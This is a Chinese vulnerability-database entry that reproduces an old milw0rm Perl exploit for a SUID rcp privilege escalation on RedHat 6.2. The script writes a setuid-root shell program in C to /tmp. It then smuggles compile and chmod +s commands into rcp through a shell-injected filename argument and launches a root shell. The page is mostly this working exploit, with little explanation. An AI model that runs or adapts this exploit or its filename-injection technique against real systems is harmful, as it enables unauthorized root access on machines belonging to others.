RedHat 6.2 /usr/bin/rcp – ‘SUID’ Local Privilege Escalation
漏洞ID | 1053490 | 漏洞类型 | |
发布时间 | 2000-11-29 | 更新时间 | 2000-11-29 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/usr/bin/perl -w
#
# exploits suid privledges on rcp
# Not really tested this but hey
# works on redhat6.2
# not werk on freebsd4.1 stable
#
# bug discovered by
# Andrew Griffiths
#
# Exploit written by tlabs
# greetz to those that know me innit
#
# Please set your rcpfile
# this can be found by doing
#
# ls -alF `which rcp`
#
# have a lot of fun
$RCPFILE="/usr/bin/rcp" ;
# configure above innit
sub USAGE
{
print "$0nWritten by Tlabsn" ;
exit 0 ;
}
if ( ! -u "$RCPFILE" )
{
printf "rcp is not suid, quitingn" ;
exit 0;
}
open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
printf TEMP "#include<unistd.h>n#include<stdlib.h>nint main()n{" ;
printf TEMP " setuid(0);ntsetgid(0);ntexecl("/bin/sh","sh",0);ntreturn 0;n}n" ;
close(TEMP);
open(HMM, ">hey")|| die "Something went wrong: $!";
print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ;
close(HMM);
system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
unlink("/tmp/shell.c");
unlink("hey");
unlink("geezer");
printf "Ok, too easy, we'll just launch a shell, lets hope shit went well, innit:)n" ;
exec '/tmp/shell' ;
# milw0rm.com [2000-11-29]
rxvt权限许可和访问控制漏洞 漏洞ID 1207670 漏洞类型 未知 发布时间 1996-01-02 更新时间 1996-01-02 CVE编号 CVE-1999-1186 CNNVD-ID CNNVD-199601-001 漏洞平台 N/A CVSS评分…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666